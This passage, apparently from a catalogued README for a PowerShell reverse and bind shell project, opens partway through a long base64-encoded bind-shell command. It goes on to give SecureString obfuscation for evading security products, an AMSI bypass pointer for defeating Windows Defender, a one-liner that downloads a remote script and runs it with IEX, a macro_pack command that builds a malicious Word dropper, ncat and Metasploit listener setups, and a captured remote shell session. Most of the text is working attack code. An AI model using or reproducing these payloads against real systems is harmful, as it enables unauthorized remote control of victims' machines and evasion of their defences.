JABwACAAPQAgACQAKABSAGUAYQBkAC0ASABvAHMAdAAgAC0AUAByAG8AbQBwAHQAIAAiAEUAbgB0AGUAcgAgAHAAbwByAHQAIABuAHUAbQBiAGUAcgAiACkALgBUAHIAaQBtACgAKQA7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAIgA7ACAAaQBmACAAKAAkAHAALgBMAGUAbgBnAHQAaAAgAC0AbAB0ACAAMQApACAAewAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAiAFAAbwByAHQAIABuAHUAbQBiAGUAcgAgAGkAcwAgAHIAZQBxAHUAaQByAGUAZAAiADsAIAB9ACAAZQBsAHMAZQAgAHsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBQAG8AdwBlAHIAUwBoAGUAbABsACAAQgBpAG4AZAAgAFQAQwBQACAAdgA0AC4AMAAgAGIAeQAgAEkAdgBhAG4AIABTAGkAbgBjAGUAawAuAGAAbgBHAGkAdABIAHUAYgAgAHIAZQBwAG8AcwBpAHQAbwByAHkAIABhAHQAIABnAGkAdABoAHUAYgAuAGMAbwBtAC8AaQB2AGEAbgAtAHMAaQBuAGMAZQBrAC8AcABvAHcAZQByAHMAaABlAGwAbAAtAHIAZQB2AGUAcgBzAGUALQB0AGMAcAAuACIAOwAgACQAbAAgAD0AIAAkAGMAIAA9ACAAJABzACAAPQAgACQAYgAgAD0AIAAkAHcAIAA9ACAAJABkACAAPQAgACQAcgAgAD0AIAAkAG4AdQBsAGwAOwAgAHQAcgB5ACAAewAgACQAbAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABjAHAATABpAHMAdABlAG4AZQByACgAIgAwAC4AMAAuADAALgAwACIALAAgACQAcAApADsAIAAkAGwALgBTAHQAYQByAHQAKAApADsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBCAGEAYwBrAGQAbwBvAHIAIABpAHMAIAB1AHAAIABhAG4AZAAgAHIAdQBuAG4AaQBuAGcALgAuAC4AYABuAGAAbgBXAGEAaQB0AGkAbgBnACAAZgBvAHIAIABjAGwAaQBlAG4AdAAgAHQAbwAgAGMAbwBuAG4AZQBjAHQALgAuAC4AYABuACIAOwAgAGQAbwAgAHsAIABpAGYAIAAoACQAbAAuAFAAZQBuAGQAaQBuAGcAKAApACkAIAB7ACAAJABjACAAPQAgACQAbAAuAEEAYwBjAGUAcAB0AFQAYwBwAEMAbABpAGUAbgB0ACgAKQA7ACAAfQAgAGUAbABzAGUAIAB7ACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBNAGkAbABsAGkAcwBlAGMAbwBuAGQAcwAgADUAMAAwADsAIAB9ACAAfQAgAHcAaABpAGwAZQAgACgAJABjACAALQBlAHEAIAAkAG4AdQBsAGwAKQA7ACAAJABsAC4AUwB0AG8AcAAoACkAOwAgACQAcwAgAD0AIAAkAGMALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwAgACQAYgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAxADAAMgA0ADsAIAAkAGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwA7ACAAJAB3ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAoACQAcwAsACAAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALAAgADEAMAAyADQAKQA7ACAAJAB3AC4AQQB1AHQAbwBGAGwAdQBzAGgAIAA9ACAAJAB0AHIAdQBlADsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAIgBDAGwAaQBlAG4AdAAgAGgAYQBzACAAYwBvAG4AbgBlAGMAdABlAGQAIQBgAG4AIgA7ACAAJABiAHkAIAA9ACAAMAA7ACAAZABvACAAewAgACQAdwAuAFcAcgBpAHQAZQAoACIAUABTAD4AIgApADsAIABkAG8AIAB7ACAAJABiAHkAIAA9ACAAJABzAC4AUgBlAGEAZAAoACQAYgAsACAAMAAsACAAJABiAC4ATABlAG4AZwB0AGgAKQA7ACAAaQBmACAAKAAkAGIAeQAgAC0AZwB0ACAAMAApACAAewAgACQAZAAgACsAPQAgACQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiACwAIAAwACwAIAAkAGIAeQApADsAIAB9ACAAfQAgAHcAaABpAGwAZQAgACgAJABzAC4ARABhAHQAYQBBAHYAYQBpAGwAYQBiAGwAZQApADsAIABpAGYAIAAoACQAYgB5ACAALQBnAHQAIAAwACkAIAB7ACAAJABkACAAPQAgACQAZAAuAFQAcgBpAG0AKAApADsAIABpAGYAIAAoACQAZAAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwACkAIAB7ACAAdAByAHkAIAB7ACAAJAByACAAPQAgAEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AQwBvAG0AbQBhAG4AZAAgACQAZAAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwA7ACAAfQAgAGMAYQB0AGMAaAAgAHsAIAAkAHIAIAA9ACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4AIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwA7ACAAfQAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAGQAOwAgAGkAZgAgACgAJAByAC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAKQAgAHsAIAAkAHcALgBXAHIAaQB0AGUAKAAkAHIAKQA7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAAcgA7ACAAfQAgAH0AIAB9ACAAfQAgAHcAaABpAGwAZQAgACgAJABiAHkAIAAtAGcAdAAgADAAKQA7ACAAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQwBsAGkAZQBuAHQAIABoAGEAcwAgAGQAaQBzAGMAbwBuAG4AZQBjAHQAZQBkACEAIgA7ACAAfQAgAGMAYQB0AGMAaAAgAHsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBJAG4AbgBlAHIARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlADsAIAB9ACAAZgBpAG4AYQBsAGwAeQAgAHsAIABpAGYAIAAoACQAbAAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJABsAC4AUwBlAHIAdgBlAHIALgBDAGwAbwBzAGUAKAApADsAIAAkAGwALgBTAGUAcgB2AGUAcgAuAEQAaQBzAHAAbwBzAGUAKAApADsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIABsADsAIAB9ACAAaQBmACAAKAAkAHcAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgACQAdwAuAEMAbABvAHMAZQAoACkAOwAgACQAdwAuAEQAaQBzAHAAbwBzAGUAKAApADsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAB3ADsAIAB9ACAAaQBmACAAKAAkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgACQAcwAuAEMAbABvAHMAZQAoACkAOwAgACQAcwAuAEQAaQBzAHAAbwBzAGUAKAApADsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIABzADsAIAB9ACAAaQBmACAAKAAkAGMAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgACQAYwAuAEMAbABvAHMAZQAoACkAOwAgACQAYwAuAEQAaQBzAHAAbwBzAGUAKAApADsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIABjADsAIAB9ACAAaQBmACAAKAAkAGIAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewAgACQAYgAuAEMAbABlAGEAcgAoACkAOwAgAEMAbABlAGEAcgAtAFYAYQByAGkAYQBiAGwAZQAgAGIAOwAgAH0AIABpAGYAIAAoACQAcgAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAAcgA7ACAAfQAgAGkAZgAgACgAJABkACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIABDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIABkADsAIAB9ACAAWwBHAEMAXQA6ADoAQwBvAGwAbABlAGMAdAAoACkAOwAgAH0AIAB9ACAAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAAcAA7AA==\n```\n\nThe encoded script will prompt for input. See the slightly altered script [here](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/prompt/powershell_bind_tcp_prompt.ps1) - used the [minified](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/prompt/minified/powershell_bind_tcp_prompt_mini.ps1) script to reduce the command length.\n\n### SecureString\n\nTo generate a PowerShell SecureString from a PowerShell script, run the following PowerShell command (the string can get very long):\n\n```pwsh\nConvertFrom-SecureString -k (0..15) (ConvertTo-SecureString (Get-Content -Path $script -Raw) -AsPlainText -Force)\n```\n\nTo decode and run a PowerShell SecureString, run the following PowerShell command:\n\n```pwsh\nIEX((New-Object System.Net.NetworkCredential(\"\", (ConvertTo-SecureString -k (0..15) $string))).Password)\n```\n\nMost security products will flag a PowerShell script as malicious if the script uses `\u0026` symbol excessively.\n\nCheck the [manually obfuscated](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/obfuscated/powershell_reverse_tcp_manual.ps1) and transformed reverse shell script [here](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/obfuscated/secure_string/powershell_reverse_tcp_secure_string.ps1).\n\nCheck the [manually obfuscated](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/obfuscated/powershell_bind_tcp_manual.ps1) and transformed bind shell script [here](https://github.com/ivan-sincek/powershell-reverse-tcp/blob/master/src/invoke_expression/obfuscated/secure_string/powershell_bind_tcp_secure_string.ps1).\n\n## AMSI Bypass\n\nIf Windows Defender is blocking your PowerShell script or encoded command execution, generate an AMSI bypass code from [AMSI.fail](https://amsi.fail) and run it in your PowerShell session. Credits to the author!\n\nAfter running the AMSI bypass code, you can download the content of your PowerShell script from the web using this one-liner:\n\n```pwsh\nIEX([System.IO.StreamReader]::New([System.Net.WebRequest]::Create('https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/src/prompt/minified/powershell_reverse_tcp_prompt_mini.ps1').GetResponse().GetResponseStream()).ReadToEnd());\n```\n\nFind out more about AMSI bypass at [S3cur3Th1sSh1t/Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell). Credits to the author!\n\n## MS Word Integration\n\nTo embed a PowerShell script into an MS Word document, check [macro_pack](https://github.com/sevagas/macro_pack) tool. Credits to the author!\n\nRun the following command from either PowerShell or Command Prompt:\n\n```fundamental\necho \"https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/src/invoke_expression/prompt/powershell_reverse_tcp_prompt.ps1\" | macro_pack.exe -t DROPPER_PS -o -G powpow.doc\n```\n\n## Set Up a Listener\n\nTo set up a listener, open your preferred console on Kali Linux and run one of the examples below.\n\nSet up `ncat` listener:\n\n```fundamental\nncat -nvlp 9000\n```\n\nSet up `multi/handler` listener:\n\n```fundamental\nmsfconsole -q\n\nuse exploit/multi/handler\n\nset PAYLOAD windows/shell_reverse_tcp\n\nset LHOST 192.168.8.185\n\nset LPORT 9000\n\nexploit\n```\n\n## Runtime\n\n```fundamental\n┌──(root💀kali)-[~]\n└─# ncat -nvlp 9000\nNcat: Version 7.93 ( https://nmap.org/ncat )\nNcat: Listening on :::9000\nNcat: Listening on 0.0.0.0:9000\nNcat: Connection from 192.168.1.109.\nNcat: Connection from 192.168.1.109:50418.\nPS\u003eGet-Host\n\n\nName             : ConsoleHost\nVersion          : 5.1.19041.2673\nInstanceId       : 3d17d7be-e720-4f39-93a2-cf509887f57a\nUI               : System.Management.Automation.Internal.Host.InternalHostUserInterface\nCurrentCulture   : hr-HR\nCurrentUICulture : en-US\nPrivateData      : Microsoft.PowerShell.ConsoleHost+ConsoleColorProxy\nDebuggerEnabled  : True\nIsRunspacePushed : False\nRunspace         : System.Management.Automation.Runspaces.LocalRunspace\n\n\n\nPS\u003e\n```\n","funding_links":[],"categories":["PowerShell","PowerShell (153)"],"sub_categories":[],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fivan-sincek%2Fpowershell-reverse-tcp","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fivan-sincek%2Fpowershell-reverse-tcp","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fivan-sincek%2Fpowershell-reverse-tcp/lists"}